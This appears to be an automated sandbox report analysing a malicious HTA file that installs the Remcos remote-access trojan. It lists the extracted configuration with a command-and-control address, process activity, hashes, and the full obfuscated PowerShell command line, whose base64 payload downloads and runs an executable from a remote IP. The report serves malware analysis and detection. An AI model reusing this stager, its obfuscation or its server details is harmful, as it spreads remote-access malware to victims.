Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 03:19
Behavioral task
behavioral1
Sample
73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644.hta
Resource
win7-20240903-en
General
-
Target
73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644.hta
-
Size
143KB
-
MD5
fd6fc3abb81de5133fb2de54b937ca20
-
SHA1
241f7fa153504078a9a9b07f966f3c4e862a9545
-
SHA256
73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
-
SHA512
5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516
-
SSDEEP
768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl
Malware Config
Extracted
remcos
elvis
107.173.4.16:2560
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-GJDISH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 3044 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 3044 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2584 nicetomeetyousweeet.exe -
Loads dropped DLL 4 IoCs
pid Process 3044 powershell.exe 3044 powershell.exe 3044 powershell.exe 3044 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3044 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3060 wrote to memory of 320 3060 mshta.exe 31 PID 3060 wrote to memory of 320 3060 mshta.exe 31 PID 3060 wrote to memory of 320 3060 mshta.exe 31 PID 3060 wrote to memory of 320 3060 mshta.exe 31 PID 320 wrote to memory of 3044 320 cmd.exe 33 PID 320 wrote to memory of 3044 320 cmd.exe 33 PID 320 wrote to memory of 3044 320 cmd.exe 33 PID 320 wrote to memory of 3044 320 cmd.exe 33 PID 3044 wrote to memory of 2684 3044 powershell.exe 34 PID 3044 wrote to memory of 2684 3044 powershell.exe 34 PID 3044 wrote to memory of 2684 3044 powershell.exe 34 PID 3044 wrote to memory of 2684 3044 powershell.exe 34 PID 2684 wrote to memory of 2816 2684 csc.exe 35 PID 2684 wrote to memory of 2816 2684 csc.exe 35 PID 2684 wrote to memory of 2816 2684 csc.exe 35 PID 2684 wrote to memory of 2816 2684 csc.exe 35 PID 3044 wrote to memory of 2584 3044 powershell.exe 37 PID 3044 wrote to memory of 2584 3044 powershell.exe 37 PID 3044 wrote to memory of 2584 3044 powershell.exe 37 PID 3044 wrote to memory of 2584 3044 powershell.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hsszhjey.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA78.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDA77.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
-
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"4⤵
- Executes dropped EXE
PID:2584
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56c16d5e09d968fe737f6aad70d4e7739
SHA169565d5e1ef489cb02c1267b74176d4074735794
SHA2566c2a2dd9e86eb3c63258bad721745f869824a6469a76e7ef58407f5ff7bbe989
SHA512aed79bb96d8a3cdcd3fbdaf60659cf0c98274b09e6115bf0fff58e98478a4d25cb668c4cfda1ffb7bca5ac8b7d6e4ecc141c12f000ad642f97de0b2a5d81fd85
-
Filesize
3KB
MD58aff5e3c0108e36a7d909d38d138c58a
SHA184557042c4cedf68c459c962ab5a26937b9f5ca4
SHA256fc7effa3fa3da96d4e5df88182b7350fb8589f2625adedf0bf51ebf2aa77759e
SHA512942fe994e5c3250d5bf43d0c8af6890c44ebd518d1cdd6eb5a415f85cb145792a95b1fc92ff82aa7f33260a0f46b896fe7943fe96736cc3b0ce8fd6202a4af14
-
Filesize
7KB
MD5b8cb1f0ac35a196d0bcab3162b2f2dff
SHA1f1ee47d7111b5554481a3817e04c1c2534e394fe
SHA2562d3d45feff8b00af9d8ab8ab9f7a5bf0ce478061700da0f40f1af3582b5e4f79
SHA512a57d32898e0842162d975772e1ca9d40fc90a49e5fa231e98e3c1cc8d7ee2d78e6daf372654709f2fe972054f665dc68ce569b1576e81c23f6fd643386b27685
-
Filesize
530KB
MD5c6b0fba610732719435d9621878bc605
SHA1789afce0b2016029215db7cca0ce7c4acfa54b4c
SHA256ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d
SHA5125d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933
-
Filesize
652B
MD56ab45d3a1757662fc2f64529318bb019
SHA17a6a7da1f35c02b81ad2080f5d9604bfdab00c25
SHA2564c7953fc43f7ca676e3a4942f9d9a634feff00bac095662fa5656197632131c5
SHA512ccee7843c68e8e4908eff4532109d0c620eb05c07fd4a4828fe080cbc7d7a59f90bd7a41b8506b940cba9826e09390b11a84eae27c0b1354c36a96a138b66cbe
-
Filesize
493B
MD500df4ae943d803cb15795b1fd55ead94
SHA1fc1509b646d150cc4d1c2d92cf772be4af67716b
SHA256e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a
SHA512e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796
-
Filesize
309B
MD5249191783844264da644754f8886d1ed
SHA15bb64fa12aa0acdf31f3bb7148ad6107048272a0
SHA256bc869449ff16a41cc47de54a5933e5114e45dbbd99d3d233b9570a895e140368
SHA512336677c3ce403076626785b3258bb57859e308853535e09e16c735cf1255bf89e6cc8eaf386c710d0061be7d50e817c9bdc64d7065907680625365c9cdedf57d